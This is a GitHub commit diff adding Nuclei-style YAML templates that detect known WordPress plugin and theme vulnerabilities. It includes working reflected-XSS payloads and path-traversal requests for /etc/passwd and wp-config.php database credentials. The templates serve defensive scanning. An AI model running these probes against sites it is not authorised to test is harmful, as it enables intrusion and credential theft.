-
Notifications
You must be signed in to change notification settings - Fork 272
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
8c092e9
commit 42d0338
Showing
52 changed files
with
2,693 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20241207 | ||
20241208 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2012-4242 | ||
|
||
info: | ||
name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242 | ||
|
||
description: "Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page." | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2012-4273 | ||
|
||
info: | ||
name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273 | ||
|
||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
id: CVE-2014-4940 | ||
|
||
info: | ||
name: WordPress Plugin Tera Charts - Directory Traversal | ||
author: daffainfo | ||
severity: high | ||
description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. | ||
reference: https://www.cvedetails.com/cve/CVE-2014-4940 | ||
tags: cve,cve2014,wordpress,wp-plugin,lfi | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd" | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: regex | ||
regex: | ||
- "root:.*:0:0" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
id: CVE-2015-1000012 | ||
info: | ||
name: WordPress MyPixs <=0.3 - Local File Inclusion | ||
author: daffainfo | ||
severity: high | ||
description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability. | ||
reference: | ||
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 | ||
- http://www.vapidlabs.com/advisory.php?v=154 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2015-1000012 | ||
- http://web.archive.org/web/20210518144916/https://www.securityfocus.com/bid/94495 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2015-1000012 | ||
cwe-id: CWE-200 | ||
metadata: | ||
google-query: inurl:"/wp-content/plugins/mypixs" | ||
tags: cve,cve2015,wordpress,wp-plugin,lfi | ||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd" | ||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- "root:.*:0:0:" | ||
part: body | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/06/06 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
id: CVE-2016-1000127 | ||
|
||
info: | ||
name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Reflected XSS in wordpress plugin ajax-random-post v2.00 | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 | ||
tags: cve,cve2016,wordpress,xss,wp-plugin | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2016-1000127 | ||
cwe-id: CWE-79 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
id: CVE-2016-1000153 | ||
|
||
info: | ||
name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Reflected XSS in wordpress plugin tidio-gallery v1.1 | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 | ||
- http://www.vapidlabs.com/wp/wp_advisory.php?v=427 | ||
- https://wordpress.org/plugins/tidio-gallery | ||
- http://www.securityfocus.com/bid/93543 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2016-1000153 | ||
cwe-id: CWE-79 | ||
tags: cve,cve2016,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
id: CVE-2019-14205 | ||
info: | ||
name: WordPress Ext Adaptive Images LFI | ||
author: pikpikcu | ||
severity: high | ||
tags: cve,cve2019,wordpress,wp-plugin,lfi | ||
description: A Local File Inclusion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php. | ||
reference: https://github.com/security-kma/EXPLOITING-CVE-2019-14205 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.50 | ||
cve-id: CVE-2019-14205 | ||
cwe-id: CWE-22 | ||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php' | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "DB_NAME" | ||
- "DB_PASSWORD" | ||
part: body | ||
condition: and | ||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
id: CVE-2021-24176 | ||
|
||
info: | ||
name: WordPress JH 404 Logger XSS | ||
author: Ganofins | ||
severity: medium | ||
description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard. | ||
reference: | ||
- https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 | ||
- https://wordpress.org/plugins/jh-404-logger/ | ||
tags: cve,cve2021,wordpress,wp-plugin,xss | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 5.40 | ||
cve-id: CVE-2021-24176 | ||
cwe-id: CWE-79 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "JH 404 Logger" | ||
part: body | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,43 @@ | ||
id: CVE-2021-24342 | ||
|
||
info: | ||
name: JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS) | ||
author: pikpikcu | ||
severity: medium | ||
description: JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue. | ||
reference: | ||
- https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24342 | ||
|
||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2021-24342 | ||
cwe-id: CWE-79 | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /?ajax-request=jnews HTTP/1.1 | ||
Host: {{Hostname}} | ||
Accept: */* | ||
Content-Type: application/x-www-form-urlencoded | ||
lang=en_US&cat_id=6"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 | ||
matchers-condition: and | ||
matchers: | ||
|
||
- type: word | ||
words: | ||
- '</script><script>alert(document.domain)</script>' | ||
part: body | ||
|
||
- type: word | ||
words: | ||
- 'Content-Type: text/html' | ||
part: header | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,63 @@ | ||
id: CVE-2022-0422 | ||
|
||
info: | ||
name: WordPress White Label CMS <2.2.9 - Cross-Site Scripting | ||
author: random-robbie | ||
severity: medium | ||
description: | | ||
WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing. | ||
impact: | | ||
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. | ||
remediation: | | ||
Update to WordPress White Label CMS plugin version 2.2.9 or later to mitigate this vulnerability. | ||
reference: | ||
- https://wpscan.com/vulnerability/429be4eb-8a6b-4531-9465-9ef0d35c12cc | ||
- https://plugins.trac.wordpress.org/changeset/2672615 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0422 | ||
- https://github.com/ARPSyndicate/cvemon | ||
- https://github.com/ARPSyndicate/kenzer-templates | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2022-0422 | ||
cwe-id: CWE-79 | ||
epss-score: 0.001 | ||
epss-percentile: 0.40139 | ||
cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:* | ||
metadata: | ||
max-request: 1 | ||
vendor: videousermanuals | ||
product: white_label_cms | ||
framework: wordpress | ||
tags: cve2022,cve,wordpress,xss,wp-plugin,wpscan,videousermanuals | ||
|
||
http: | ||
- raw: | ||
- | | ||
POST /wp-login.php?wlcms-action=preview HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- "alert(/XSS/);" | ||
|
||
- type: word | ||
part: body | ||
words: | ||
- "wlcms-login-wrapper" | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
# digest: 490a0046304402202d864fa8ffa1dc0885d61b1e349c1c268e266c83d7d2e11e236e9df48039abe002205fb0b2d84d41d806cc6e52c0fdd1dbeed94827fa1019c490c3926ec16402eb79:922c64590222798bb761d5b6d8e72950 |
Oops, something went wrong.